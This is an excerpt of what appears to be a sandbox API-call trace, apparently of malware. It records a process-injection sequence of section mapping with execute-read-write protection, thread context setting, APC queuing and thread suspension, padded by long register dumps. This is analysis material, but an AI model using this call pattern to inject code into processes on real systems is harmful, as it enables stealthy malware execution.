Context=0xde160*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x4e, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x34, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100, SegGs=0x0, SegFs=0x2, SegEs=0x0, SegDs=0x14d1f8, Edi=0x0, Esi=0x1, Ebx=0x0, Edx=0x1, Ecx=0x0, Eax=0x2, Ebp=0x0, Eip=0x8daa8f38, SegCs=0x7ffd, EFlags=0x0, Esp=0x0, SegSs=0x4875cc0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x51, [7]=0x8d, [8]=0xfd, [9]=0x7f, [10]=0x0, [11]=0x0, [12]=0xff, [13]=0xff, [14]=0xff, [15]=0xff, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x30, [21]=0xd5, [22]=0x14, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xa4, [45]=0x58, [46]=0x63, [47]=0xab, [48]=0xfd, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0155.002] NtCreateSection (in: SectionHandle=0xddbf0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xddb90, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xddbf0*=0x13c) returned 0x0 [0155.058] NtMapViewOfSection (in: SectionHandle=0x13c, ProcessHandle=0x138, BaseAddress=0xddbf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddb98*=0xdffc6, InheritDisposition=0x7ffd00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbf8*=0x600000, SectionOffset=0x0, ViewSize=0xddb98*=0xe0000) returned 0x0 [0155.064] NtMapViewOfSection (in: SectionHandle=0x13c, ProcessHandle=0xffffffffffffffff, BaseAddress=0xddbe8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddb98*=0xe0000, InheritDisposition=0x7ffd00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbe8*=0xed0000, SectionOffset=0x0, ViewSize=0xddb98*=0xe0000) returned 0x0 [0155.141] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0xed0000) returned 0x0 [0155.449] NtClose (Handle=0x13c) returned 0x0 [0155.454] NtSetContextThread (ThreadHandle=0x134, Context=0xde160*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x4e, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x34, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x100, SegGs=0x0, SegFs=0x2, SegEs=0x0, SegDs=0x14d1f8, Edi=0x0, Esi=0x1, Ebx=0x0, Edx=0x1, Ecx=0x0, Eax=0x2, Ebp=0x0, Eip=0x8daa8f38, SegCs=0x7ffd, EFlags=0x0, Esp=0x0, SegSs=0x4875cc0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x51, [7]=0x8d, [8]=0xfd, [9]=0x7f, [10]=0x0, [11]=0x0, [12]=0xff, [13]=0xff, [14]=0xff, [15]=0xff, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x30, [21]=0xd5, [22]=0x14, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xb5, [45]=0xad, [46]=0x65, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0155.454] NtQueueApcThread (ThreadHandle=0x134, ApcRoutine=0x65adc2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0155.459] NtResumeThread (in: ThreadHandle=0x134, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0155.650] NtClose (Handle=0x138) returned 0x0 [0155.650] NtClose (Handle=0x134) returned 0x0 [0156.117] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0xc90, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x134) returned 0x0 [0156.117] NtQueryInformationProcess (in: ProcessHandle=0x134, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0156.118] NtQueryInformationProcess (in: ProcessHandle=0x134, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0156.159] NtReadVirtualMemory (in: ProcessHandle=0x134, BaseAddress=0x216000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0156.159] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0161.333] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0xc84) | out: ThreadHandle=0xdea64*=0x138) returned 0x0 [0161.413] NtSuspendThread (in: ThreadHandle=0x138, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0161.414] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x134, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2150000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0161.426] NtGetContextThread (in: ThreadHandle=0x138, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x1bff14, Ebx=0x216000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x1bfebc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x1bfea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, 